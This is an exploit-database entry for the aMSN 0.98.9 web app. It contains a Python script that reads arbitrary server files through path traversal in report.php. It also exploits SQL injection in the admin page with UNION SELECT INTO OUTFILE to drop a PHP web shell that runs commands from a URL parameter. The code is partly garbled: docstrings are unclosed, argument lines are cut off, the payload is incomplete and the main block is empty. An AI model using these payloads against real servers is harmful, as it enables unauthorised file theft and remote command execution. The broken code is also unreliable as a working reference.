aMSN 0.98.9 Web App - Multiple Vulnerabilities

ID 1337DAY-ID-21375
Type zdt
Reporter drone
Modified 2013-10-14T00:00:00


Exploit for php platform in category web applications

                                            from argparse import ArgumentParser
import urllib2
import string
import random
    Preauth LFI and SQLi in the web app packaged with aMSN 0.98.9
def lfi(options):
    """ exploit the LFI
    addr = 'http://{0}{1}/bugs/report.php?lang=../../../../../{2}'.format(\
                            options.ip, options.root, options.lfi)
    data = urllib2.urlopen(addr).read().rstrip().split("ERROR")[0]
    print data
def run(options):
    """ exploit lfi or sqli
    if options.lfi:
        return lfi(options)
    shell = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(5))
    sqli = 'http://{0}{1}/bugs/admin/index.php?show=bug&id='.format(options.ip, options.root)
    # ' UNION SELECT '<?php system($_GET['cmd']) ?>,2,3,4,5,6,7,8,9 INTO OUTFILE 'yourshell';-- -
    exploit = '1\'%20UNION%20SELECT%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\',2,3,4,5,6,7,8,9%20'\
    urllib2.urlopen(sqli + exploit)
    print '[!] Shell dropped.  http://%s%s/%s.php?cmd=ls' % (options.ip, options.root, shell)
def parse_args():
    parser = ArgumentParser()
    parser.add_argument("-i", help='Server address', action='store', dest='ip', required=True)
    parser.add_argument('-l', help='Local file inclusion', action='store', dest='lfi',
    parser.add_argument('-p', help='Path to amsn [/amsn]', action='store', dest='root',
    parser.add_argument('-w', help='Path to drop shell [/var/www/amsn', dest='path',
    options = parser.parse_args()
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.root = options.root if options.root[-1] != '/' else options.root[:-1]
    return options
if __name__ == "__main__":

# [2018-01-08]  #